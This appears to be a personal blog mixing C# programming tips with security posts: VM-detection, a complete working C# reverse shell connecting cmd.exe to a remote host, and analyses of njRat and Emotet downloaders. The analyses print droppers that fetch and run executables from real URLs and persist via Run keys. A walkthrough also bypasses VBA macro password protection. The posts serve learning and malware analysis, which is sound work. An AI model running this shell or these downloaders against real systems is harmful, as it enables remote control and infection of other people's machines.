Windows Developer Blog

Reverse engineering evasion techniques with CSharp

2019-01-08T09:06:00.001-08:00

I wrote some proof-of-concept code for detecting virtual machine and/or debugger environment. The code is available at GitHub. The code is not a complete collection of the all evasion techniques, just a few simple things to detect VM and/or debugger.

Here is how the application looks in the hosting OS i.e. Windows 10:

It has a false positive result in "Detect VM". The reason for this can be seen in the process list where it finds "vmware-authd" process. All the other indicators are however "negative".

Here is the same thing done in the Oracle VirtualBox environment with Windows 7:

Again it detects VM by process name(s). But now there are other indicators too: small system drive (under 128 GB), no BIOS serial number and finally WMI returns "VirtualBox" as system model. This is definitely a virtual machine.

Finally VMware player with Windows 8.1:

Once again it detects VM by process name(s). Other indicators are: small system drive and WMI returns "VMware Virtual Platform" as system model. These are also strong indicators for VM.

If you like to try the source code there is one point you may have to take into account. I got the following error message in VS2017:

There are many reasons why you could get this "Unable to copy file..." and "Could not find file..." error message. In this case it was F-Secure SAFE that detected object code as malicious and thus deleted the file. The workaround, if you get the same error, is to whitelist the source code folder in your AV product.

Windows Reverse Shell With CSharp

2018-12-26T06:42:00.000-08:00

I was quite unfamiliar with the reverse shells so I wanted to understand the concept and learn to make one of my own. I started googling and there were many examples available for Linux environment. However, I wanted to get a reverse shell between two Windows machines. I found one example and that was written with CSharp which was even better: https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

I did not get the sample code to work which had much to do with my lack of understanding. But every failure is a great learning opportunity. I modified the original code and the final code I came up with accepts command line parameters. So here is my CSharp code for reverse shell:

using System;

using System.Text;

using System.IO;

using System.Diagnostics;

using System.Net.Sockets;

namespace RevShell

{

class Program

{

static StreamWriter streamWriter;

static Process p;

// https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

// https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

static void Main(string[] args)

{

TcpClient client = null;

Stream stream;

StreamReader streamReader;

StringBuilder strInput;

string ipAddress = "127.0.0.1";

int port = 0;

// Commandline has IP and port number

if(args.Length == 2)

{

ipAddress = args[0];

if (int.TryParse(args[1], out port))

{

// Port number 1 - 65535

if (port < 1 || port > 65535) port = 80;

}

} // Commandline has port number

else if(args.Length == 1)

{

if(int.TryParse(args[0], out port))

{

// Port number 1 - 65535

if (port < 1 || port > 65535) port = 80;

}

if (port == 0) port = 80; // Use default

try

{

// Connect to host

client = new TcpClient(ipAddress, port);

Console.WriteLine("Connecting: " + ipAddress + ":" + port);

}

catch(Exception ex)

{

Console.WriteLine("Exception: " + ex.Message);

return;

}

stream = client.GetStream();

streamReader = new StreamReader(stream);

streamWriter = new StreamWriter(stream);

strInput = new StringBuilder();

// Create and start a shell in the client machine, redirect I/O to host machine

p = new Process();

p.StartInfo.FileName = "cmd.exe";

p.StartInfo.CreateNoWindow = true;

p.StartInfo.UseShellExecute = false;

p.StartInfo.RedirectStandardOutput = true;

p.StartInfo.RedirectStandardInput = true;

p.StartInfo.RedirectStandardError = true;

p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);

p.Start();

p.StandardInput.AutoFlush = true;

p.BeginOutputReadLine();

while (true)

{

try

{

string line = streamReader.ReadLine();

if (!string.IsNullOrEmpty(line))

{

p.StandardInput.WriteLine(line);

}

catch(Exception ex)

{

Console.WriteLine("Exception: " + ex.Message);

break;

}

private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)

{

StringBuilder strOutput = new StringBuilder();

if (!String.IsNullOrEmpty(outLine.Data))

{

try

{

string line = outLine.Data;

if(!string.IsNullOrEmpty(line))

{

streamWriter.WriteLine(line);

streamWriter.Flush();

}

catch (Exception ex)

{

Console.WriteLine("Exception: " + ex.Message);

}

As this is a purely proof-of-concept code, it does not have any persistence or stealthy features.

The reverse shell contains two parts. First part is the shell itself which in the code above is cmd.exe. The second part is the communication from the "victim" machine back to caller's "server" which is done with the TCP Socket. Command shell is started as a new process and the process' standard input, output and error streams are redirected to the TCP Socket which in turn sends them to the caller.

The next problem was the "server" or caller side. There had to be some way to connect to the same TCP Socket. Every example I found used Linux's netcat command for this. With some more googling I found out that NMAP contains a Windows implementation of the netcat. So I downloaded Ncat utility: https://nmap.org/ncat/

Finally I had every piece I needed and the reverse shell worked like a charm :)

Start Ncat with -l and -v options to get it to listen mode and verbose mode.

Start reverse shell in the "victim" machine.

Deobfuscating Trojan downloader scripts i.e. basics to get you started

2018-12-23T08:28:00.000-08:00

This is an entry level view to understand scripting used by downloaders and by other malware. I assume no previous knowledge of scripting and the goal is to make the reader familiar with this topic. First I introduce scripting engines (shells) commonly used by downloaders. At the end I provide a few step-through of selected samples.

Commands and command line switches found in malware

First a few words about notation:

· * DOS commands may use either forward slash (/) or hyphen (-) as a switch character, so cmd.exe /c and cmd.exe -c are the same commands. Powershell uses only hyphen (-)

· * commands are written in lowercase, if possible. In the real samples, it is common that they are written in mixed case for example: C:\WiNDOws\sYStEm32\CMD.EXE /C. In general the scripting languages are case-insensitive

· * Powershell has a "standard form" for commands for example Invoke-Command which may be written as invoke-command in this document

· * as a rule of thumb DOS and Vbscript use double-quotes with strings and Powershell uses single-quotes. There are however exceptions for this rule

DOS Commands

cmd.exe /c [string]

/c Carries out the command specified by string and then terminates command shell.

start.exe /b [string] Starts a separate window to run a specified program or command

/b Start application without creating a new window

Powershell

About notation:

· commands and command switches are represented both with their shortest and full form for example -w[indowstyle] means that the switch can be between -w and -windowstyle and it may contain any number of characters from [indowstyle] part like -wind

powershell -noexit -nol -noninteractiv -noprofile -execution bypass -windows hidden [string] |IEX

-noe[xit] Doesn't exit after running commands

-nol[ogo] Hides the copyright banner at startup

-noni[nteractive] Doesn't present an interactive prompt to the user

-nop[rofile] Doesn't load the PowerShell profile

-ex[ecutionpolicy] Sets the default execution policy for the current session and saves it in the $env:PSExecutionPolicyPreference environment variable. Value bypass: nothing is blocked and there are no warnings or prompts.

-w[indowstyle] Sets the window style for the session. Value hidden: no window is shown

[string] A command string or script block

IEX Invoke-Expression command

powershell.exe -nop -w hidden -c [string]

-c[ommand] Executes the specified commands (with any parameters) as though they were typed at the PowerShell command prompt.

powershell -nop -sta -w 1 -enc [string]

-sta Starts PowerShell using a single-threaded apartment. This is usually obsolete setting to distract analysis

-e[ncodedcommand] Accepts a base-64-encoded string as a command

-w 1 Same as -windows hidden, now the value hidden is replaced with a numeric constant

A sample step-through

Here is a very simple downloader sample which I found at Pastebin.

powershell.exe -nop -w hidden -c $l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://192.168.0.10:8080/E1Y8TdrQEfw');

For the sake of clarity I have divided a single long string with linebreaks. I have also added linenumbers.

1. powershell.exe -nop -w hidden -c

2. $l=new-object net.webclient;

3. $l.proxy=[Net.WebRequest]::GetSystemWebProxy();

4. $l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;

5. IEX $l.downloadstring('http://192.168.0.10:8080/E1Y8TdrQEfw');

Steps:

1. Invoke Powershell with no execution policy, hidden window and execute following commands

2. Create a WebClient object and assign object to variable l

3. Assign proxy settings to variable I's proxy property

4. Set proxy credentials

5. Invoke expression "I.downloadstring" which has string parameter 'http://192.168.0.10:8080/E1Y8TdrQEfw'

Here is another sample from Pastebin.

Set usdbzw = CreateObject("WScript.Shell")

usdbzw.Run "powershell $gscbut = New-Object -ComObject Msxml2.XMLHTTP; $hgttbdy = New-Object -ComObject ADODB.Stream; $zteyxhj = $env:temp + '\Dropbo.exe';$gscbut.open('GET', 'http://team.hitweb.it/tes2t?12143', $false);$gscbut.send(); if($gscbut.Status -eq "200"){$hgttbdy.open();$hgttbdy.type = 1;$hgttbdy.write($gscbut.responseBody);$hgttbdy.position = 0;$hgttbdy.savetofile($zteyxhj);$hgttbdy.close();} Start-Process $zteyxhj;",0, true

Here is the sample with linebreaks and linenumbers.

1. Set usdbzw = CreateObject("WScript.Shell")

2. usdbzw.Run

3. "powershell

4. $gscbut = New-Object -ComObject Msxml2.XMLHTTP;

5. $hgttbdy = New-Object -ComObject ADODB.Stream;

6. $zteyxhj = $env:temp + '\Dropbo.exe';

7. $gscbut.open('GET', 'http://team.hitweb.it/tes2t?12143', $false);

8. $gscbut.send();

9. if($gscbut.Status -eq "200")

10. {$hgttbdy.open();

11. $hgttbdy.type = 1;

12. $hgttbdy.write($gscbut.responseBody);

13. $hgttbdy.position = 0;

14. $hgttbdy.savetofile($zteyxhj);

15. $hgttbdy.close();}

16. Start-Process $zteyxhj;"

17. ,0, true

Steps:

1.-2. and 17. Create VBScipt shell object and execute string. Create no window and wait the script to finish

3. The string contains Powershell script

4. Create XMLHTTP object

5. Create ADODB.Stream object

6. Create a temporary file %TEMP%\Dropbo.exe

7.-8. Open HTTP connection

9. Check if the connection was established

10.-15. Read the HTTP response stream and write it to temporary file %TEMP%\Dropbo.exe

16. Execute %TEMP%\Dropbo.exe

Analysing njRat a.k.a Generic.MSIL.Bladabindi downloader

2018-11-22T06:25:00.000-08:00

Yesterday (21.11.2018) njRat a.k.a Worm.VBS.Dinihou.au dropper code was set to pastebin.com. It was still available today in https://pastebin.com/W1yyfPiy. The dropper downloads and persists excutable which is known as Generic.MSIL.Bladabindi.1E8DC4B3

VBS code downloads an executable with SHA256 hash c26f8c36052c150625a0e2e2676af5fa7e7d222bb2343720a66d48c7a9855256 and it can be found on VirusTotal https://www.virustotal.com/#/file/c26f8c36052c150625a0e2e2676af5fa7e7d222bb2343720a66d48c7a9855256/detection

VBS code itself can be found as https://www.virustotal.com/#/file/6a4523e7eb200e1a3b22805d525b1eb0409388df118f524d7c4e64fc7a514274/detection

Script code contains very long obfuscated lines. Firstly I dissected long lines shorter and prefixed then. So I got the following code:

Dim str
str = Chr(27 + 84) & Chr(16 + 94) & Chr(-12 + 44) & Chr(18 + 83) & Chr(60 + 54) & Chr(51 + 63) & Chr(205 - 94)
str = str & Chr(43 + 71) & Chr(60 - 28) & Chr(41 + 73) & Chr(60 + 41) & Chr(7475 / 65) & Chr(135 - 18) & Chr(118 - 9)
.
.
.
str = str & Chr(64 + 18) & Chr(19 + 93) & Chr(147 - 33) & Chr(37 * 3) & Chr(140 - 41) & Chr(171 - 70) & Chr(62 + 53)
str = str & Chr(80 + 35) & Chr(40 - 27) & Chr(780 / 78)
? str

Deobfuscated code is a VB script code too:

on error resume next
WScript.Sleep 60
Dim ofso
Set ofso = CreateObject("Scripting.FileSystemObject")
CreerRep("C:\ProgramData\Adobe\system32\")
Sub CreerRep(Chemin)
    If Not ofso.FolderExists(chemin) Then
        CreerRep(ofso.GetParentFolderName(chemin))
        ofso.CreateFolder(chemin)
    End If
End Sub

dim SSSSS
dim process
dim PPPPP
set SSSSS = CreateObject("Microsoft.XMLHTTP")
set process = CreateObject("WScript.shell")
Set PPPPP = createobject("Adodb.Stream")
URL = "https://c.top4top.net/p_1055q1ssb1.jpg"
Rprocess = "C:\ProgramData\Adobe\system32\process.exe"
SSSSS.open "GET", URL, False
SSSSS.send
with PPPPP
    .type = 1 '//binary
    .open
    .write SSSSS.responseBody
    .savetofile "C:\ProgramData\Adobe\system32\process.exe", 2
end with

Set ObjetRegedit = CreateObject("WScript.Shell")
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CPU64"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\CPU64.exe", "REG_SZ"
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\process"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\process.exe", "REG_SZ"
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dekstop"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\dekstop.ini.vbs", "REG_SZ"
Set ObjetRegedit = Nothing

WScript.Sleep 6000
process.run Rprocess

First the code creates C:\ProgramData\Adobe\system32\ folder for the final executable. Next an XMLHTTP object is created. Object downloads a jpeg-image from https://c.top4top.net/p_1055q1ssb1.jpg which is at this moment still available. The file is of course not an image but njRat executable. The file saved as C:\ProgramData\Adobe\system32\process.exe.

For persisting the executable, the script uses Windows Registry. The script code creates three new keys under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, namely: CPU64, process and dekstop (yes it has a typo). Registry key values are: C:\ProgramData\Adobe\system32\CPU64.exe, C:\ProgramData\Adobe\system32\process.exe and C:\ProgramData\Adobe\system32\dekstop.ini.vbs respectively. So it seems that the first and third registry keys are redundant and only HKCU \Software\Microsoft\Windows\CurrentVersion\Run\process key does persist this malware.

Finally script code uses WScript.shell object to launch downloaded payload.

Analysing Word VBA Downloader for Emotet Malware

2018-05-06T10:17:00.000-07:00

I found pretty fresh samples of Emotet downloader code from https://www.malware-traffic-analysis.net/2018/05/04/index.html and decided to do a quick deobfuscation of the code.

First phase is obfuscated VBA code in Word document. If you open the document you will see familiar Office 365 logo. You will see also suggestions to Enable Editing or Enable Content which would execute VBA code.

Anyway the VBA code is pretty heavily obfuscated with lots of unnecessary code.

Code execution starts from module ujDjvvQ which is renamed ThisDocument. Module contains Autoopen function which can be simplified:

Sub Autoopen()
On Error Resume Next
TiOoQjQV( nFODYizhYv )
End Sub

Function TiOoQjQV contains shell function and the argument is mostly deobfuscated code.

Deobfuscation function resides in module srYodFmNbnD, and it can be simplified to:

Function OUtvU(ByVal ciUzkrCSLkWBnW As String, TLAaHGLpbjzzY, oYFjLnWNLj)
On Error Resume Next
SCXkhnfEKHM = Mid(StrReverse(ciUzkrCSLkWBnW), TLAaHGLpbjzzY, oYFjLnWNLj)
OUtvU = SCXkhnfEKHM
End Function

In effect function OUtvU is a wrapper to mid function. A little twist is first reversing string with StrReverse.

Shell function resides in module DnaCdFskcp and it's simplified as:

Sub TiOoQjQV(qFkOSjfj As String)
On Error Resume Next
[Shell] Chr(vbKeyC) + qFkOSjfj, 0
End Sub

The argument for shell function i.e. parameter's qFkOSjfj value is:

md jVpSwjvTz zCLlIDOdohUVOziMjRLUbTKVir okGWmYP & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %kzwhjFmUVUOiJkk%=kcwKnsUZV&&set %atDQwjOtB%=p&&set %nFODYizhYv%=o^w&&set %lFhJFzoEwJVsjOS%=WdjEbhWvCv&&set %ciUzkrCSLkWBnW%=!%atDQwjOtB%!&&set %iriHrfYMvAFLQXZ%=NaOWDOflQPn&&set %TiOoQjQV%=e^r&&set %SCXkhnfEKHM%=!%nFODYizhYv%!&&set %qFkOSjfj%=s&&set %VtDjlGJSzZpSqTU%=SULNJfBUv&&set %oYFjLnWNLj%=he&&set %TLAaHGLpbjzzY%=ll&&!%ciUzkrCSLkWBnW%!!%SCXkhnfEKHM%!!%TiOoQjQV%!!%qFkOSjfj%!!%oYFjLnWNLj%!!%TLAaHGLpbjzzY%! " . ( $env:comSpeC[4,26,25]-JoIn'')( (('ZmInsa'+'dasd = &('+'g'+'36n'+'g36+g36eg36+g'+'3'+'6'+'w'+'-obj'+'ecg36+g'+'36tg3'+'6'+') random;Z'+'m'+'I'+'YYU = .(g36ne'+'g3'+'6'+'+g'+'36'+'wg36+g36-obj'+'ectg36) Sys'+'tem.Ne'+'t.We'+'bC'+'li'+'ent;'+'Zm'+'INSB ='+' ZmInsa'+'d'+'a'+'sd.nex'+'t(10'+'000, 282'+'1'+'3'+'3);Z'+'mIAD'+'CX'+' = g3'+'6 http'+':'+'//'+'a'+'lian'+'.'+'d'+'e'+'/'+'4wBY'+'ki/@'+'http://agai'+'nstpe'+'rfect'+'ion.net/6'+'kWq0/@'+'ht'+'t'+'p'+'://globalreach'+'adv '+'ertising.'+'com/zfFg'+'SQ/'+'@htt'+'p://www.'+'fanoff.com/Z'+'VljVr/'+'@'+'h'+'ttp'+'://thur'+'tell.co'+'m/TCyk/g'+'3'+'6'+'.S'+'plit(g3'+'6@'+'g'+'3'+'6);ZmI'+'S'+'DC '+'= ZmIe'+'nv:pu'+'bl'+'i'+'c + g3'+'6Dcfg36 +'+' Zm'+'INSB +'+' (g'+'3'+'6'+'.exg36'+'+g3'+'6eg36);fo'+'reach'+'(Z'+'mIasfc'+' '+'in ZmI'+'AD'+'CX){t'+'ry{ZmIYYU.sH6Do'+'0mIWn'+'l0mIOa'+'dFI'+'0mI'+'lesH6('+'ZmI'+'asfc.sH6ToStr0mIi0'+'m'+'INgsH6(),'+' ZmI'+'SDC)'+';&(g36Inv'+'og'+'3'+'6+'+'g36'+'k'+'g'+'36+g36e'+'-It'+'emg36'+')(Z'+'m'+'I'+'SDC'+');bre'+'ak;}catch'+'{}'+'}') -repLACE '0mI',[chaR]96 -repLACE([chaR]68+[chaR]99+[chaR]102),[chaR]92-cREPLACE 'g36',[chaR]39 -cREPLACE ([chaR]90+[chaR]109+[chaR]73),[chaR]36 -cREPLACE ([chaR]115+[chaR]72+[chaR]54),[chaR]34) )

This script code has two parts. First part is DOS code which creates a folder and sets environment variables that evaluate to string 'powershell'. Second part is obfuscated powershell code.

To analyse powershell code, I first made a replace table:
Replace Table

0mI '
ZmI $
g36 '
Dcf \
sH6 *

Finally I deobfuscated powershell code as (excluding Replace functions):

( $env:comSpeC[4,26,25]-JoIn)( (('
$nsadasd = &('new-object) random;
$YYU = .('new-object')System.Net.WebClient;
$NSB =$nsadasd.next(10000, 282133);
$ADCX = '
http://alian.de/4wBYki/@
http://againstperfection.net/6kWq0/@
http://globalreachadvertising.com/zfFgSQ/@
http://www.fanoff.com/ZVljVr/@
http://thurtell.com/TCyk/
'.Split('@');
$SDC = $env:public + '\' + $NSB + ('.exe');
foreach($asfc in $ADCX)
{try{$YYU.*DoWnlOadFIle*($asfc.*ToStriNg*(), $SDC);
&('Invoke-Item')($SDC);
break;}
catch{}})

Obfuscation method in VBA code resembles very much the code in: A sample analysis walkthrough with RETouch: Testing a new feature. I guess they are both made with the same malware or obfuscation kit.

Revealing Password Protected VBA Macro Code

2018-04-29T06:26:00.000-07:00

Last night I downloaded a malicious Word document from Any.Run website. Malware is recognized according VirusTotal as Trojan-Downloader.MSWord.Agent.byj (Kaspersky).

Once opened the document suggests macro and content enabling. Notice the funny typo: "Can't Veiw?".

Viewing the VBA code is made difficult with MS Office's built-in VBA project password protection. So the password protection has to be removed or cracked. I decided to remove password protection.

The document itself was also password protected so this protection has to be removed first. Since I did not know the password I just guessed the password: "1234".

Document password can be removed from File/Properties. I was using Finnish Word so try to follow screenshots anyway.

When the Document password is removed, save the document in docm format.

Now, open the Explorer, locate the previously saved docm format file and open it with 7-Zip as an archive file. I used 7-Zip but this could be done with any Archiver application.

Locate vbaProject.bin from inside the archive (Word document). Then extract vbaProject.bin out of the file.

Open the extracted vbaProject.bin file with your hex editor. Search "DPB" as ASCII text. There should be only one occurrence of that string. After you have found it, replace it from "DPB" to "DPx". Save this modified file and close the hex editor.

Drag the modified vbaProject.bin file back to 7-Zip and replace the original vbaProject.bin file. If you use some other archiver you may need to do this in some other way.

Save the archive file and now you can re-open docm file with Word. You should get an error message, see below image. Answer "Yes" and the document loads.

Open VBA editor and select VBA project's properties. You should be able to remove project locking and any passwords. You may need to save and reload the document to changes to take effect.

Finally you should see the hidden VBA code.

Catching .NET exceptions with a condition

2018-04-22T05:32:00.001-07:00

CSharp provides methods to catch exceptions only when a condition is met. This can be used for example to display a messagebox when the application is in development and when the application is in the production mode just write to log the exception.

Here is a very simple piece of code. The point in here is to catch the division by zero exception.

bool IsDevelopmentmode = true;

try
{
    for(int i = -2; i <= 2; i++)
    {
        int x = 4 / i;
    }
}
catch (DivideByZeroException ex) when (IsDevelopmentmode)
{
    MessageBox.Show("Error " + ex.Message, "Error",
        MessageBoxButtons.OK, MessageBoxIcon.Warning);
}
catch (DivideByZeroException)
{
    // Log error
}

The code has two catch (DivideByZeroException) statements. The first one has a condition when (IsDevelopmentmode). As long as the condition is true the first catch statement is used. If the condition is false the latter catch statement is executed. As you can see it's possible to mix both conditional and unconditional catch statements. The condition can be any expression that evaluates to boolean value.

There must be at least one catch statement to capture exception. Otherwise the exception is thrown up in the call stack and in the worst case application's user gets the error message. Here is the same example without latter catch statement and the condition is set to false.

bool IsDevelopmentmode = false;

try
{
    for(int i = -2; i <= 2; i++)
    {
        int x = 4 / i;
    }
}
catch (DivideByZeroException ex) when (IsDevelopmentmode)
{
    MessageBox.Show("Error " + ex.Message, "Error",
        MessageBoxButtons.OK, MessageBoxIcon.Warning);
}

Now the exception is not catched and you get following error:

Make a shortcut for application with CSharp

2018-04-15T09:36:00.000-07:00

I needed to make a shortcut file (.lnk file) from my CSharp application. As far as I know there is no way to do it directly from the .NET code. Only way is to use Windows API calls or Windows scripting capabilities. I decided to use scripting and here is how it gets done.

First, add a reference to COM-object 'Windows Script Host Object Model' from your project's properties. Secondly, import namespace 'IWshRuntimeLibrary' in your code. And here is the code itself:

private void MakeShortcut(string appDisplayName, string exeFullPath)
{
    if (string.IsNullOrEmpty(appDisplayName) || string.IsNullOrEmpty(exeFullPath))
    {
        return; // Fail if name or path is missing
    }
    try
    {
        IWshShell_Class wsh = new IWshShell_Class();
        IWshRuntimeLibrary.IWshShortcut shortcut = wsh.CreateShortcut(
            Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\" + appName + ".lnk")
            as IWshRuntimeLibrary.IWshShortcut;
        shortcut.Arguments = "";
        shortcut.TargetPath = exeFullPath;
        shortcut.WindowStyle = 1; // Normal window
        shortcut.Description = "Shortcut to " + appName;
        shortcut.WorkingDirectory = "";
        shortcut.IconLocation = exeFullPath;
        shortcut.Save();
    }
    catch
    {

    }
}

I wrote it as a procedure so the code can be easily copy/pasted to other projects as well.

The code above makes a shortcut to Desktop, so change ' Environment.SpecialFolder.Desktop' if you need your shortcut to some other place.

RETouch installer and download

2018-04-15T07:10:00.001-07:00

Although RETouch source code is hosted in the GitHub, the RETouch binaries are not. That is because the size limit of the free GitHub account. Now the latest binary with Windows installer is in the DropBox. Donwload link for RETouch is https://www.dropbox.com/sh/hvttkwkt4ovk5r7/AAAn4xqQgjqU0UiD1hVoQv9aa?dl=0

String comparison, easy as a == b, right? Wrong!

2018-04-10T05:12:00.000-07:00

I have recently used a lot of string comparison. Comparing strings is not as easy as one might think. The string comparison should also be done fast when you're dealing with massive amounts of text. I have needed both case-sensitive and case-insensitive string comparisons. I've also needed to determine if a string is a substring of the other string. I have used a few methods and their variants.

To determine if a string is a substring of another string I've used two methods:
- Contains method from the string class: .Contains()
- IndexOf method from the string class: .IndexOf()

Both methods do case-sensitive matching of the strings. However, IndexOf method has an overloaded version which does a case-insensitive matching:
- .IndexOf(, 0, StringComparison.OrdinalIgnoreCase)
Another method to do case-insensitive matching is to use ToLower() method (or ToUpper()) with both strings. Since I needed fast string comparisons I started to wonder if an extra ToLower() method call would cause a huge time penalty.

I decided to compare four methods and variants:
- case-sensitive Contains method: .Contains()
- case-sensitive IndexOf method: .IndexOf()
- case-insensitive IndexOf method with ToLower method: .ToLower().IndexOf(.ToLower())
- case-insensitive .IndexOf(, 0, StringComparison.OrdinalIgnoreCase)

I wrote a small CSharp console application that provides comparisons above and would get accurate enough timing of the comparisons. To get measurable timings each comparison variant was repeated in a loop.

So here is the code:

class Program
{
    public static string stringToSearch;
    public static string text = "A Function to search for";
    public static bool match = false;
    public static DateTime startTime;
    public static TimeSpan elapsedTime;

    public static int Method1(int loops, string stringToSearch)
    {
        startTime = DateTime.Now;
        for(int i = 0; i < loops; i++)
        { 
            match = text.Contains(stringToSearch);
        }
        elapsedTime = DateTime.Now.Subtract(startTime);
        Console.WriteLine("Contains(" + stringToSearch + "): " + match.ToString());
        Console.WriteLine("Elapsed: " + (int)elapsedTime.TotalMilliseconds);
        return (int)elapsedTime.TotalMilliseconds;
    }

    public static int Method2(int loops, string stringToSearch)
    {
        startTime = DateTime.Now;
        for (int i = 0; i < loops; i++)
        {
            match = text.IndexOf(stringToSearch) >= 0;
        }
        elapsedTime = DateTime.Now.Subtract(startTime);
        Console.WriteLine("IndexOf(" + stringToSearch + "): " + match.ToString());
        Console.WriteLine("Elapsed: " + (int)elapsedTime.TotalMilliseconds);
        return (int)elapsedTime.TotalMilliseconds;
    }

    public static int Method3(int loops, string stringToSearch)
    {
        startTime = DateTime.Now;
        for (int i = 0; i < loops; i++)
        {
            match = text.ToLower().IndexOf(stringToSearch.ToLower()) >= 0;
        }
        elapsedTime = DateTime.Now.Subtract(startTime);
        Console.WriteLine("IndexOf(" + stringToSearch + ".ToLower()): " + match.ToString());
        Console.WriteLine("Elapsed: " + (int)elapsedTime.TotalMilliseconds);
        return (int)elapsedTime.TotalMilliseconds;
    }

    public static int Method4(int loops, string stringToSearch)
    {
        startTime = DateTime.Now;
        for (int i = 0; i < loops; i++)
        {
            match = text.IndexOf(stringToSearch, 0, StringComparison.OrdinalIgnoreCase) >= 0;
        }
        elapsedTime = DateTime.Now.Subtract(startTime);
        Console.WriteLine("IndexOf(" + stringToSearch + ", 0, StringComparison.OrdinalIgnoreCase) :" + match.ToString());
        Console.WriteLine("Elapsed: " + (int)elapsedTime.TotalMilliseconds);
        return (int)elapsedTime.TotalMilliseconds;
    }

    static void Main(string[] args)
    {
        int loops = 1000000; // One million
        int m1 = 0;
        int m2 = 0;
        int m3 = 0;
        int m4 = 0;

        stringToSearch = "Function";
        m1 += Method1(loops, stringToSearch);
        m2 += Method2(loops, stringToSearch);
        m3 += Method3(loops, stringToSearch);
        m4 += Method4(loops, stringToSearch);

        Console.WriteLine();
        stringToSearch = "not found";
        m1 += Method1(loops, stringToSearch);
        m2 += Method2(loops, stringToSearch);
        m3 += Method3(loops, stringToSearch);
        m4 += Method4(loops, stringToSearch);

        Console.WriteLine();
        Console.WriteLine("Method 1 Elapsed: " + (int)(m1 / 2));
        Console.WriteLine("Method 2 Elapsed: " + (int)(m2 / 2));
        Console.WriteLine("Method 3 Elapsed: " + (int)(m3 / 2));
        Console.WriteLine("Method 4 Elapsed: " + (int)(m4 / 2));

        Console.ReadKey();
    }
}

The code itself is pretty simple and should be self- explanatory.

Each method was executed both with a string that would be found and with a string that would not be found. The final timing was the average of these two.

For the case-insensitive searching .IndexOf(, 0, StringComparison.OrdinalIgnoreCase) seems to be the best choice. I was a bit surprised that this was faster than basic .IndexOf() search. If you need only case-sensitive search then .Contains() would be the fastest method.

A sample analysis walkthrough with RETouch: Testing a new feature

2018-04-09T04:52:00.001-07:00

Here is another example how to analyze a malware with RETouch. I picked up Zahlung_03_04_2018_658348.doc from hybrid-analysis.com. This sample was suitable to test new script deobfuscation feature. This new feature tries to make obfuscated script to more human readable. Feature is not yet available in Github code and will be released with RETouch 1.1 version.

Below is the image of the original code.

First I select the correct script language, that is VBScript in this case. I also select inserting linebreaks after VBScript keywords, function and variable renaming and also unescaping escaped codes.

The final result is _almost_ readable. At this point the easiest way to proceed is to copy/paste code to a Word document and do final fixing.

Copy/Pasting code to VBA-editor enables syntax checking and highlighting. That is very handy for the final steps with the code. Below is the start of the fixed VBA-code. It also shows "mysterious" procA function.

After fixing the latter part of the code, the code starts to make sense. "Mysterious" procA converts Base64 code to text. The text is split to shorter strings which are obfuscated by coding them with Base64.

VBA-code uses MSXML2.XMLHTTP to download an exe file from https://tous1site.name/axctogh.exe. Final lines start Wscript.Shell to execute downloaded file.

Executable file is no longer available and what it does would be outside of RETouch's scope anyway.

A sample analysis walkthrough with RETouch

2018-04-07T06:08:00.001-07:00

Here is an example how to analyze a malware with RETouch. The malware's hash (SHA256) is 63eaddbbe91031cb1d8f38cdbc679adacd232f97bbc061f02073d909c11c1594 and it can be found from VirusTotal. First I open datafile 63eaddbbe91031cb1d8f38cdbc679adacd232f97bbc061f02073d909c11c1594.bin (Word document). If I didn't know the SHA256, I would get the checksums first.

RETouch can calculate most commonly used hashes: MD5, SHA1 and SHA256.

Next, I check the strings that this binary file contains.

One string catches the attention: "powershell". Following strings look a lot like Base64 encoded data.

To extract Base64 data, I open binary file in hex view mode. After locating string "powershell", I select following text until I found '='-character.

I paste the text I copied from the hex view and convert Base64 to binary data.

Converted data's hex dump seems to have value zero in almost every second value. This indicates that hex dump could be Unicode encoded text.

The text really was Unicode encoded. Now I have PowerShell code which builds a string from numeric char values. I select only string building part of the code and execute the PowerShell code.

This gets the final unobfuscated code.

What the code actually does is not relevant now. The relevant thing in here is that RETouch has done its job.

RETouch 1.0 released

2018-04-05T16:01:00.000-07:00

RETouch is a windows application for deobfuscating and analyzing malicious scripts. Malicious scripts are commonly the first step of malware infection. Since script files are text-based, RETouch has functionality to handle texts and strings. For binary analyses there are plenty of excellent applications available. RETouch aims to be • extendible with scripting • "umbrella" for external applications Because malware and malicious scripts evolve quickly, the core functionality is just not enough. That is why RETouch provides easy scripting to extend its core functions.

Like any software with version number 1.0 this is far from perfect. I have started to program the next version with some features I left from version 1.0.

Program your own ToString method with VB.NET

2008-11-27T02:02:00.001-08:00

Every built-in type in VB.NET environment has a ToString method which returns a textual representation of the value. ToString method is declared to System.Object as

Public Overridable Function ToString() As String

and very class that inherits from System.Object inherits ToString method too. Since ToString method is declared as Overridable, inherited classes typically override this base method. Besides inheriting ToString method it is also overloaded with method that accepts a format string as a parameter. More information about format strings for ToString method can be found in MSDN. Here's a link to Int64.ToString method with format string. The same MSDN page contains also examples for formatting numbers, dates and time. Examples are provided to both VB.NET and C#.

When you write your own classes in VB.NET, there's nothing to prevent that you write your own ToString method too. Here's a simple PersonName class that implements ToString method.

Option Explicit On
Option Strict On
Public Class PersonName

  Private _FirstName As String
  Private _LastName As String

  Public Sub New()
    ' Initialize class
    _FirstName = ""
    _LastName = ""

  End Sub

